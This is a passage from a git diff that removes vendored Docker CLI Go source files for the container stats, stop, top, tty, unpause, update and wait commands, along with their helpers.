"github.com/docker/docker/api/types/events" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/spf13/cobra" -) - -type statsOptions struct { - all bool - noStream bool - format string - containers []string -} - -// NewStatsCommand creates a new cobra.Command for `docker stats` -func NewStatsCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts statsOptions - - cmd := &cobra.Command{ - Use: "stats [OPTIONS] [CONTAINER...]", - Short: "Display a live stream of container(s) resource usage statistics", - Args: cli.RequiresMinArgs(0), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runStats(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)") - flags.BoolVar(&opts.noStream, "no-stream", false, "Disable streaming stats and only pull the first result") - flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template") - return cmd -} - -// runStats displays a live stream of resource usage statistics for one or more containers. -// This shows real-time information on CPU usage, memory usage, and network I/O. -func runStats(dockerCli *command.DockerCli, opts *statsOptions) error { - showAll := len(opts.containers) == 0 - closeChan := make(chan error) - - ctx := context.Background() - - // monitorContainerEvents watches for container creation and removal (only - // used when calling `docker stats` without arguments). - monitorContainerEvents := func(started chan<- struct{}, c chan events.Message) { - f := filters.NewArgs() - f.Add("type", "container") - options := types.EventsOptions{ - Filters: f, - } - - eventq, errq := dockerCli.Client().Events(ctx, options) - - // Whether we successfully subscribed to eventq or not, we can now - // unblock the main goroutine. 
- close(started) - - for { - select { - case event := <-eventq: - c <- event - case err := <-errq: - closeChan <- err - return - } - } - } - - // Get the daemonOSType if not set already - if daemonOSType == "" { - svctx := context.Background() - sv, err := dockerCli.Client().ServerVersion(svctx) - if err != nil { - return err - } - daemonOSType = sv.Os - } - - // waitFirst is a WaitGroup to wait first stat data's reach for each container - waitFirst := &sync.WaitGroup{} - - cStats := stats{} - // getContainerList simulates creation event for all previously existing - // containers (only used when calling `docker stats` without arguments). - getContainerList := func() { - options := types.ContainerListOptions{ - All: opts.all, - } - cs, err := dockerCli.Client().ContainerList(ctx, options) - if err != nil { - closeChan <- err - } - for _, container := range cs { - s := formatter.NewContainerStats(container.ID[:12], daemonOSType) - if cStats.add(s) { - waitFirst.Add(1) - go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) - } - } - } - - if showAll { - // If no names were specified, start a long running goroutine which - // monitors container events. We make sure we're subscribed before - // retrieving the list of running containers to avoid a race where we - // would "miss" a creation. 
- started := make(chan struct{}) - eh := command.InitEventHandler() - eh.Handle("create", func(e events.Message) { - if opts.all { - s := formatter.NewContainerStats(e.ID[:12], daemonOSType) - if cStats.add(s) { - waitFirst.Add(1) - go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) - } - } - }) - - eh.Handle("start", func(e events.Message) { - s := formatter.NewContainerStats(e.ID[:12], daemonOSType) - if cStats.add(s) { - waitFirst.Add(1) - go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) - } - }) - - eh.Handle("die", func(e events.Message) { - if !opts.all { - cStats.remove(e.ID[:12]) - } - }) - - eventChan := make(chan events.Message) - go eh.Watch(eventChan) - go monitorContainerEvents(started, eventChan) - defer close(eventChan) - <-started - - // Start a short-lived goroutine to retrieve the initial list of - // containers. - getContainerList() - } else { - // Artificially send creation events for the containers we were asked to - // monitor (same code path than we use when monitoring all containers). - for _, name := range opts.containers { - s := formatter.NewContainerStats(name, daemonOSType) - if cStats.add(s) { - waitFirst.Add(1) - go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) - } - } - - // We don't expect any asynchronous errors: closeChan can be closed. - close(closeChan) - - // Do a quick pause to detect any error with the provided list of - // container names. 
- time.Sleep(1500 * time.Millisecond) - var errs []string - cStats.mu.Lock() - for _, c := range cStats.cs { - cErr := c.GetError() - if cErr != nil { - errs = append(errs, fmt.Sprintf("%s: %v", c.Name, cErr)) - } - } - cStats.mu.Unlock() - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, ", ")) - } - } - - // before print to screen, make sure each container get at least one valid stat data - waitFirst.Wait() - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().StatsFormat) > 0 { - format = dockerCli.ConfigFile().StatsFormat - } else { - format = formatter.TableFormatKey - } - } - statsCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewStatsFormat(format, daemonOSType), - } - cleanScreen := func() { - if !opts.noStream { - fmt.Fprint(dockerCli.Out(), "\033[2J") - fmt.Fprint(dockerCli.Out(), "\033[H") - } - } - - var err error - for range time.Tick(500 * time.Millisecond) { - cleanScreen() - ccstats := []formatter.StatsEntry{} - cStats.mu.Lock() - for _, c := range cStats.cs { - ccstats = append(ccstats, c.GetStatistics()) - } - cStats.mu.Unlock() - if err = formatter.ContainerStatsWrite(statsCtx, ccstats); err != nil { - break - } - if len(cStats.cs) == 0 && !showAll { - break - } - if opts.noStream { - break - } - select { - case err, ok := <-closeChan: - if ok { - if err != nil { - // this is suppressing "unexpected EOF" in the cli when the - // daemon restarts so it shutdowns cleanly - if err == io.ErrUnexpectedEOF { - return nil - } - return err - } - } - default: - // just skip - } - } - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go deleted file mode 100644 index 4b57e3fe05..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go +++ /dev/null @@ -1,226 +0,0 @@ -package container - -import ( - "encoding/json" - "errors" - "io" - "strings" - 
"sync" - "time" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/client" - "golang.org/x/net/context" -) - -type stats struct { - ostype string - mu sync.Mutex - cs []*formatter.ContainerStats -} - -// daemonOSType is set once we have at least one stat for a container -// from the daemon. It is used to ensure we print the right header based -// on the daemon platform. -var daemonOSType string - -func (s *stats) add(cs *formatter.ContainerStats) bool { - s.mu.Lock() - defer s.mu.Unlock() - if _, exists := s.isKnownContainer(cs.Container); !exists { - s.cs = append(s.cs, cs) - return true - } - return false -} - -func (s *stats) remove(id string) { - s.mu.Lock() - if i, exists := s.isKnownContainer(id); exists { - s.cs = append(s.cs[:i], s.cs[i+1:]...) - } - s.mu.Unlock() -} - -func (s *stats) isKnownContainer(cid string) (int, bool) { - for i, c := range s.cs { - if c.Container == cid { - return i, true - } - } - return -1, false -} - -func collect(ctx context.Context, s *formatter.ContainerStats, cli client.APIClient, streamStats bool, waitFirst *sync.WaitGroup) { - logrus.Debugf("collecting stats for %s", s.Container) - var ( - getFirst bool - previousCPU uint64 - previousSystem uint64 - u = make(chan error, 1) - ) - - defer func() { - // if error happens and we get nothing of stats, release wait group whatever - if !getFirst { - getFirst = true - waitFirst.Done() - } - }() - - response, err := cli.ContainerStats(ctx, s.Container, streamStats) - if err != nil { - s.SetError(err) - return - } - defer response.Body.Close() - - dec := json.NewDecoder(response.Body) - go func() { - for { - var ( - v *types.StatsJSON - memPercent = 0.0 - cpuPercent = 0.0 - blkRead, blkWrite uint64 // Only used on Linux - mem = 0.0 - memLimit = 0.0 - memPerc = 0.0 - pidsStatsCurrent uint64 - ) - - if err := dec.Decode(&v); err != nil { - dec = 
json.NewDecoder(io.MultiReader(dec.Buffered(), response.Body)) - u <- err - if err == io.EOF { - break - } - time.Sleep(100 * time.Millisecond) - continue - } - - daemonOSType = response.OSType - - if daemonOSType != "windows" { - // MemoryStats.Limit will never be 0 unless the container is not running and we haven't - // got any data from cgroup - if v.MemoryStats.Limit != 0 { - memPercent = float64(v.MemoryStats.Usage) / float64(v.MemoryStats.Limit) * 100.0 - } - previousCPU = v.PreCPUStats.CPUUsage.TotalUsage - previousSystem = v.PreCPUStats.SystemUsage - cpuPercent = calculateCPUPercentUnix(previousCPU, previousSystem, v) - blkRead, blkWrite = calculateBlockIO(v.BlkioStats) - mem = float64(v.MemoryStats.Usage) - memLimit = float64(v.MemoryStats.Limit) - memPerc = memPercent - pidsStatsCurrent = v.PidsStats.Current - } else { - cpuPercent = calculateCPUPercentWindows(v) - blkRead = v.StorageStats.ReadSizeBytes - blkWrite = v.StorageStats.WriteSizeBytes - mem = float64(v.MemoryStats.PrivateWorkingSet) - } - netRx, netTx := calculateNetwork(v.Networks) - s.SetStatistics(formatter.StatsEntry{ - Name: v.Name, - ID: v.ID, - CPUPercentage: cpuPercent, - Memory: mem, - MemoryPercentage: memPerc, - MemoryLimit: memLimit, - NetworkRx: netRx, - NetworkTx: netTx, - BlockRead: float64(blkRead), - BlockWrite: float64(blkWrite), - PidsCurrent: pidsStatsCurrent, - }) - u <- nil - if !streamStats { - return - } - } - }() - for { - select { - case <-time.After(2 * time.Second): - // zero out the values if we have not received an update within - // the specified duration. 
- s.SetErrorAndReset(errors.New("timeout waiting for stats")) - // if this is the first stat you get, release WaitGroup - if !getFirst { - getFirst = true - waitFirst.Done() - } - case err := <-u: - if err != nil { - s.SetError(err) - continue - } - s.SetError(nil) - // if this is the first stat you get, release WaitGroup - if !getFirst { - getFirst = true - waitFirst.Done() - } - } - if !streamStats { - return - } - } -} - -func calculateCPUPercentUnix(previousCPU, previousSystem uint64, v *types.StatsJSON) float64 { - var ( - cpuPercent = 0.0 - // calculate the change for the cpu usage of the container in between readings - cpuDelta = float64(v.CPUStats.CPUUsage.TotalUsage) - float64(previousCPU) - // calculate the change for the entire system between readings - systemDelta = float64(v.CPUStats.SystemUsage) - float64(previousSystem) - ) - - if systemDelta > 0.0 && cpuDelta > 0.0 { - cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0 - } - return cpuPercent -} - -func calculateCPUPercentWindows(v *types.StatsJSON) float64 { - // Max number of 100ns intervals between the previous time read and now - possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals - possIntervals /= 100 // Convert to number of 100ns intervals - possIntervals *= uint64(v.NumProcs) // Multiple by the number of processors - - // Intervals used - intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage - - // Percentage avoiding divide-by-zero - if possIntervals > 0 { - return float64(intervalsUsed) / float64(possIntervals) * 100.0 - } - return 0.00 -} - -func calculateBlockIO(blkio types.BlkioStats) (blkRead uint64, blkWrite uint64) { - for _, bioEntry := range blkio.IoServiceBytesRecursive { - switch strings.ToLower(bioEntry.Op) { - case "read": - blkRead = blkRead + bioEntry.Value - case "write": - blkWrite = blkWrite + bioEntry.Value - } - } - return -} - -func 
calculateNetwork(network map[string]types.NetworkStats) (float64, float64) { - var rx, tx float64 - - for _, v := range network { - rx += float64(v.RxBytes) - tx += float64(v.TxBytes) - } - return rx, tx -} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go deleted file mode 100644 index 828d634c8a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go +++ /dev/null @@ -1,20 +0,0 @@ -package container - -import ( - "testing" - - "github.com/docker/docker/api/types" -) - -func TestCalculateBlockIO(t *testing.T) { - blkio := types.BlkioStats{ - IoServiceBytesRecursive: []types.BlkioStatEntry{{8, 0, "read", 1234}, {8, 1, "read", 4567}, {8, 0, "write", 123}, {8, 1, "write", 456}}, - } - blkRead, blkWrite := calculateBlockIO(blkio) - if blkRead != 5801 { - t.Fatalf("blkRead = %d, want 5801", blkRead) - } - if blkWrite != 579 { - t.Fatalf("blkWrite = %d, want 579", blkWrite) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/container/stop.go b/vendor/github.com/docker/docker/cli/command/container/stop.go deleted file mode 100644 index c68ede5368..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/stop.go +++ /dev/null @@ -1,67 +0,0 @@ -package container - -import ( - "fmt" - "strings" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type stopOptions struct { - time int - timeChanged bool - - containers []string -} - -// NewStopCommand creates a new cobra.Command for `docker stop` -func NewStopCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts stopOptions - - cmd := &cobra.Command{ - Use: "stop [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Stop one or more running containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers 
= args - opts.timeChanged = cmd.Flags().Changed("time") - return runStop(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.IntVarP(&opts.time, "time", "t", 10, "Seconds to wait for stop before killing it") - return cmd -} - -func runStop(dockerCli *command.DockerCli, opts *stopOptions) error { - ctx := context.Background() - - var timeout *time.Duration - if opts.timeChanged { - timeoutValue := time.Duration(opts.time) * time.Second - timeout = &timeoutValue - } - - var errs []string - - errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, id string) error { - return dockerCli.Client().ContainerStop(ctx, id, timeout) - }) - for _, container := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/top.go b/vendor/github.com/docker/docker/cli/command/container/top.go deleted file mode 100644 index 160153ba7f..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/top.go +++ /dev/null @@ -1,58 +0,0 @@ -package container - -import ( - "fmt" - "strings" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type topOptions struct { - container string - - args []string -} - -// NewTopCommand creates a new cobra.Command for `docker top` -func NewTopCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts topOptions - - cmd := &cobra.Command{ - Use: "top CONTAINER [ps OPTIONS]", - Short: "Display the running processes of a container", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - opts.args = args[1:] - return runTop(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - 
flags.SetInterspersed(false) - - return cmd -} - -func runTop(dockerCli *command.DockerCli, opts *topOptions) error { - ctx := context.Background() - - procList, err := dockerCli.Client().ContainerTop(ctx, opts.container, opts.args) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - fmt.Fprintln(w, strings.Join(procList.Titles, "\t")) - - for _, proc := range procList.Processes { - fmt.Fprintln(w, strings.Join(proc, "\t")) - } - w.Flush() - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/tty.go b/vendor/github.com/docker/docker/cli/command/container/tty.go deleted file mode 100644 index 6af8e2becf..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/tty.go +++ /dev/null @@ -1,103 +0,0 @@ -package container - -import ( - "fmt" - "os" - gosignal "os/signal" - "runtime" - "time" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/client" - "github.com/docker/docker/pkg/signal" - "golang.org/x/net/context" -) - -// resizeTtyTo resizes tty to specific height and width -func resizeTtyTo(ctx context.Context, client client.ContainerAPIClient, id string, height, width uint, isExec bool) { - if height == 0 && width == 0 { - return - } - - options := types.ResizeOptions{ - Height: height, - Width: width, - } - - var err error - if isExec { - err = client.ContainerExecResize(ctx, id, options) - } else { - err = client.ContainerResize(ctx, id, options) - } - - if err != nil { - logrus.Debugf("Error resize: %s", err) - } -} - -// MonitorTtySize updates the container tty size when the terminal tty changes size -func MonitorTtySize(ctx context.Context, cli *command.DockerCli, id string, isExec bool) error { - resizeTty := func() { - height, width := cli.Out().GetTtySize() - resizeTtyTo(ctx, cli.Client(), id, height, width, isExec) - } - - resizeTty() - - if runtime.GOOS == "windows" { - go 
func() { - prevH, prevW := cli.Out().GetTtySize() - for { - time.Sleep(time.Millisecond * 250) - h, w := cli.Out().GetTtySize() - - if prevW != w || prevH != h { - resizeTty() - } - prevH = h - prevW = w - } - }() - } else { - sigchan := make(chan os.Signal, 1) - gosignal.Notify(sigchan, signal.SIGWINCH) - go func() { - for range sigchan { - resizeTty() - } - }() - } - return nil -} - -// ForwardAllSignals forwards signals to the container -func ForwardAllSignals(ctx context.Context, cli *command.DockerCli, cid string) chan os.Signal { - sigc := make(chan os.Signal, 128) - signal.CatchAll(sigc) - go func() { - for s := range sigc { - if s == signal.SIGCHLD || s == signal.SIGPIPE { - continue - } - var sig string - for sigStr, sigN := range signal.SignalMap { - if sigN == s { - sig = sigStr - break - } - } - if sig == "" { - fmt.Fprintf(cli.Err(), "Unsupported signal: %v. Discarding.\n", s) - continue - } - - if err := cli.Client().ContainerKill(ctx, cid, sig); err != nil { - logrus.Debugf("Error sending signal: %s", err) - } - } - }() - return sigc -} diff --git a/vendor/github.com/docker/docker/cli/command/container/unpause.go b/vendor/github.com/docker/docker/cli/command/container/unpause.go deleted file mode 100644 index c4d8d4841e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/unpause.go +++ /dev/null @@ -1,50 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type unpauseOptions struct { - containers []string -} - -// NewUnpauseCommand creates a new cobra.Command for `docker unpause` -func NewUnpauseCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts unpauseOptions - - cmd := &cobra.Command{ - Use: "unpause CONTAINER [CONTAINER...]", - Short: "Unpause all processes within one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) 
error { - opts.containers = args - return runUnpause(dockerCli, &opts) - }, - } - return cmd -} - -func runUnpause(dockerCli *command.DockerCli, opts *unpauseOptions) error { - ctx := context.Background() - - var errs []string - errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerUnpause) - for _, container := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/update.go b/vendor/github.com/docker/docker/cli/command/container/update.go deleted file mode 100644 index 75765856c5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/update.go +++ /dev/null @@ -1,163 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type updateOptions struct { - blkioWeight uint16 - cpuPeriod int64 - cpuQuota int64 - cpuRealtimePeriod int64 - cpuRealtimeRuntime int64 - cpusetCpus string - cpusetMems string - cpuShares int64 - memoryString string - memoryReservation string - memorySwap string - kernelMemory string - restartPolicy string - - nFlag int - - containers []string -} - -// NewUpdateCommand creates a new cobra.Command for `docker update` -func NewUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts updateOptions - - cmd := &cobra.Command{ - Use: "update [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Update configuration of one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers 
= args - opts.nFlag = cmd.Flags().NFlag() - return runUpdate(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.Uint16Var(&opts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)") - flags.Int64Var(&opts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period") - flags.Int64Var(&opts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota") - flags.Int64Var(&opts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") - flags.Int64Var(&opts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") - flags.StringVar(&opts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") - flags.StringVar(&opts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") - flags.Int64VarP(&opts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") - flags.StringVarP(&opts.memoryString, "memory", "m", "", "Memory limit") - flags.StringVar(&opts.memoryReservation, "memory-reservation", "", "Memory soft limit") - flags.StringVar(&opts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") - flags.StringVar(&opts.kernelMemory, "kernel-memory", "", "Kernel memory limit") - flags.StringVar(&opts.restartPolicy, "restart", "", "Restart policy to apply when a container exits") - - return cmd -} - -func runUpdate(dockerCli *command.DockerCli, opts *updateOptions) error { - var err error - - if opts.nFlag == 0 { - return fmt.Errorf("You must provide one or more flags when using this command.") - } - - var memory int64 - if opts.memoryString != "" { - memory, err = units.RAMInBytes(opts.memoryString) - if err != nil { - return err - } - } - - var memoryReservation int64 - if opts.memoryReservation != "" { - memoryReservation, err = units.RAMInBytes(opts.memoryReservation) - if err != nil { - return err - } - } - - var 
memorySwap int64 - if opts.memorySwap != "" { - if opts.memorySwap == "-1" { - memorySwap = -1 - } else { - memorySwap, err = units.RAMInBytes(opts.memorySwap) - if err != nil { - return err - } - } - } - - var kernelMemory int64 - if opts.kernelMemory != "" { - kernelMemory, err = units.RAMInBytes(opts.kernelMemory) - if err != nil { - return err - } - } - - var restartPolicy containertypes.RestartPolicy - if opts.restartPolicy != "" { - restartPolicy, err = runconfigopts.ParseRestartPolicy(opts.restartPolicy) - if err != nil { - return err - } - } - - resources := containertypes.Resources{ - BlkioWeight: opts.blkioWeight, - CpusetCpus: opts.cpusetCpus, - CpusetMems: opts.cpusetMems, - CPUShares: opts.cpuShares, - Memory: memory, - MemoryReservation: memoryReservation, - MemorySwap: memorySwap, - KernelMemory: kernelMemory, - CPUPeriod: opts.cpuPeriod, - CPUQuota: opts.cpuQuota, - CPURealtimePeriod: opts.cpuRealtimePeriod, - CPURealtimeRuntime: opts.cpuRealtimeRuntime, - } - - updateConfig := containertypes.UpdateConfig{ - Resources: resources, - RestartPolicy: restartPolicy, - } - - ctx := context.Background() - - var ( - warns []string - errs []string - ) - for _, container := range opts.containers { - r, err := dockerCli.Client().ContainerUpdate(ctx, container, updateConfig) - if err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - warns = append(warns, r.Warnings...) 
- } - if len(warns) > 0 { - fmt.Fprintf(dockerCli.Out(), "%s", strings.Join(warns, "\n")) - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/utils.go b/vendor/github.com/docker/docker/cli/command/container/utils.go deleted file mode 100644 index 6bef92463c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/utils.go +++ /dev/null @@ -1,143 +0,0 @@ -package container - -import ( - "strconv" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/events" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/versions" - "github.com/docker/docker/cli/command" - clientapi "github.com/docker/docker/client" -) - -func waitExitOrRemoved(ctx context.Context, dockerCli *command.DockerCli, containerID string, waitRemove bool) chan int { - if len(containerID) == 0 { - // containerID can never be empty - panic("Internal Error: waitExitOrRemoved needs a containerID as parameter") - } - - var removeErr error - statusChan := make(chan int) - exitCode := 125 - - // Get events via Events API - f := filters.NewArgs() - f.Add("type", "container") - f.Add("container", containerID) - options := types.EventsOptions{ - Filters: f, - } - eventCtx, cancel := context.WithCancel(ctx) - eventq, errq := dockerCli.Client().Events(eventCtx, options) - - eventProcessor := func(e events.Message) bool { - stopProcessing := false - switch e.Status { - case "die": - if v, ok := e.Actor.Attributes["exitCode"]; ok { - code, cerr := strconv.Atoi(v) - if cerr != nil { - logrus.Errorf("failed to convert exitcode '%q' to int: %v", v, cerr) - } else { - exitCode = code - } - } - if !waitRemove { - stopProcessing = true - } else { - // If we are talking to an older daemon, `AutoRemove` is not supported. 
- // We need to fall back to the old behavior, which is client-side removal - if versions.LessThan(dockerCli.Client().ClientVersion(), "1.25") { - go func() { - removeErr = dockerCli.Client().ContainerRemove(ctx, containerID, types.ContainerRemoveOptions{RemoveVolumes: true}) - if removeErr != nil { - logrus.Errorf("error removing container: %v", removeErr) - cancel() // cancel the event Q - } - }() - } - } - case "detach": - exitCode = 0 - stopProcessing = true - case "destroy": - stopProcessing = true - } - return stopProcessing - } - - go func() { - defer func() { - statusChan <- exitCode // must always send an exit code or the caller will block - cancel() - }() - - for { - select { - case <-eventCtx.Done(): - if removeErr != nil { - return - } - case evt := <-eventq: - if eventProcessor(evt) { - return - } - case err := <-errq: - logrus.Errorf("error getting events from daemon: %v", err) - return - } - } - }() - - return statusChan -} - -// getExitCode performs an inspect on the container. It returns -// the running state and the exit code. -func getExitCode(ctx context.Context, dockerCli *command.DockerCli, containerID string) (bool, int, error) { - c, err := dockerCli.Client().ContainerInspect(ctx, containerID) - if err != nil { - // If we can't connect, then the daemon probably died. 
- if !clientapi.IsErrConnectionFailed(err) { - return false, -1, err - } - return false, -1, nil - } - return c.State.Running, c.State.ExitCode, nil -} - -func parallelOperation(ctx context.Context, containers []string, op func(ctx context.Context, container string) error) chan error { - if len(containers) == 0 { - return nil - } - const defaultParallel int = 50 - sem := make(chan struct{}, defaultParallel) - errChan := make(chan error) - - // make sure result is printed in correct order - output := map[string]chan error{} - for _, c := range containers { - output[c] = make(chan error, 1) - } - go func() { - for _, c := range containers { - err := <-output[c] - errChan <- err - } - }() - - go func() { - for _, c := range containers { - sem <- struct{}{} // Wait for active queue sem to drain. - go func(container string) { - output[container] <- op(ctx, container) - <-sem - }(c) - } - }() - return errChan -} diff --git a/vendor/github.com/docker/docker/cli/command/container/wait.go b/vendor/github.com/docker/docker/cli/command/container/wait.go deleted file mode 100644 index 19ccf7ac25..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/wait.go +++ /dev/null @@ -1,50 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type waitOptions struct { - containers []string -} - -// NewWaitCommand creates a new cobra.Command for `docker wait` -func NewWaitCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts waitOptions - - cmd := &cobra.Command{ - Use: "wait CONTAINER [CONTAINER...]", - Short: "Block until one or more containers stop, then print their exit codes", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runWait(dockerCli, &opts) - }, - } - return cmd -} - -func runWait(dockerCli *command.DockerCli, opts *waitOptions) 
error { - ctx := context.Background() - - var errs []string - for _, container := range opts.containers { - status, err := dockerCli.Client().ContainerWait(ctx, container) - if err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%d\n", status) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/events_utils.go b/vendor/github.com/docker/docker/cli/command/events_utils.go deleted file mode 100644 index e710c97576..0000000000 --- a/vendor/github.com/docker/docker/cli/command/events_utils.go +++ /dev/null @@ -1,49 +0,0 @@ -package command - -import ( - "sync" - - "github.com/Sirupsen/logrus" - eventtypes "github.com/docker/docker/api/types/events" -) - -type eventProcessor func(eventtypes.Message, error) error - -// EventHandler is abstract interface for user to customize -// own handle functions of each type of events -type EventHandler interface { - Handle(action string, h func(eventtypes.Message)) - Watch(c <-chan eventtypes.Message) -} - -// InitEventHandler initializes and returns an EventHandler -func InitEventHandler() EventHandler { - return &eventHandler{handlers: make(map[string]func(eventtypes.Message))} -} - -type eventHandler struct { - handlers map[string]func(eventtypes.Message) - mu sync.Mutex -} - -func (w *eventHandler) Handle(action string, h func(eventtypes.Message)) { - w.mu.Lock() - w.handlers[action] = h - w.mu.Unlock() -} - -// Watch ranges over the passed in event chan and processes the events based on the -// handlers created for a given action. -// To stop watching, close the event chan. 
-func (w *eventHandler) Watch(c <-chan eventtypes.Message) { - for e := range c { - w.mu.Lock() - h, exists := w.handlers[e.Action] - w.mu.Unlock() - if !exists { - continue - } - logrus.Debugf("event handler: received event: %v", e) - go h(e) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container.go b/vendor/github.com/docker/docker/cli/command/formatter/container.go deleted file mode 100644 index 6273453355..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/container.go +++ /dev/null @@ -1,235 +0,0 @@ -package formatter - -import ( - "fmt" - "strconv" - "strings" - "time" - - "github.com/docker/docker/api" - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" - units "github.com/docker/go-units" -) - -const ( - defaultContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Ports}}\t{{.Names}}" - - containerIDHeader = "CONTAINER ID" - namesHeader = "NAMES" - commandHeader = "COMMAND" - runningForHeader = "CREATED" - statusHeader = "STATUS" - portsHeader = "PORTS" - mountsHeader = "MOUNTS" - localVolumes = "LOCAL VOLUMES" - networksHeader = "NETWORKS" -) - -// NewContainerFormat returns a Format 